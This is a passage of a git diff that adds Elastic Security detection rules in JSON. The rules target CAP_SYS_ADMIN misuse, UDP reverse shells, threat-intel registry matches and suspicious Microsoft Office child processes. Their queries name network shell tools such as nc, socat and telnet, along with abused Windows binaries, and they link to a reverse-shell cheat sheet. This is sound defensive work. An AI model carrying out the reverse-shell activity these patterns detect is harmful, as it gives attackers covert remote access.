Linux, the CAP_SYS_ADMIN capability is a powerful and broad capability that allows a process to perform a range of system administration operations, such as mounting and unmounting filesystems, configuring network interfaces, and accessing hardware devices. Attackers may leverage a misconfiguration for exploitation in order to escalate their privileges to root. The rule identifies previously unknown processes executing with CAP_SYS_ADMIN capabilities through the use of the new terms rule type.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "CAP_SYS_ADMIN Assigned to Binary", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "event.category:\"process\" and host.os.type:\"linux\" and event.type:\"start\" and event.action:\"exec\" and process.name:* and\n(process.thread.capabilities.effective:\"CAP_SYS_ADMIN\" or process.thread.capabilities.permitted:\"CAP_SYS_ADMIN\") and\nnot user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a577e524-c2ee-47bd-9c5b-e917d01d3276", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "a577e524-c2ee-47bd-9c5b-e917d01d3276_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json new file mode 100644 index 00000000000..b2ccd077e40 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"execve\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )\n ]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and\n auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and auditd.data.syscall == \"connect\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and\n network.direction == \"egress\" and destination.ip != null and destination.ip != \"127.0.0.1\" and\n destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json new file mode 100644 index 00000000000..fb46b1f60fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"executed\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and auditd.data.a1 == \"2\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connected-to\" and\n process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and network.direction == \"egress\" and destination.ip != null and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json new file mode 100644 index 00000000000..0a679843b0b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_6.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains registry data.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel Windows Registry Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry.path:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 99, + "rule_id": "a61809f3-fb5b-465c-8bff-23a8a068ac60", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "registry.path", + "type": "mapping", + "value": "threat.indicator.registry.path" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "a61809f3-fb5b-465c-8bff-23a8a068ac60_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json new file mode 100644 index 00000000000..2f7e92ec9f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_111.json @@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Office Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\n \"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\",\n \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\"\n ) and\n process.name : (\n \"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\",\n \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\",\n \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\",\n \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\",\n \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\"\n ) and\n not (\n process.parent.name : \"outlook.exe\" and\n process.name : \"rundll32.exe\" and\n process.args : \"shell32.dll,Control_RunDLL\" and\n process.args : \"srchadmin.dll\"\n )\n", + "references": [ + "https://www.elastic.co/blog/vulnerability-summary-follina" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: 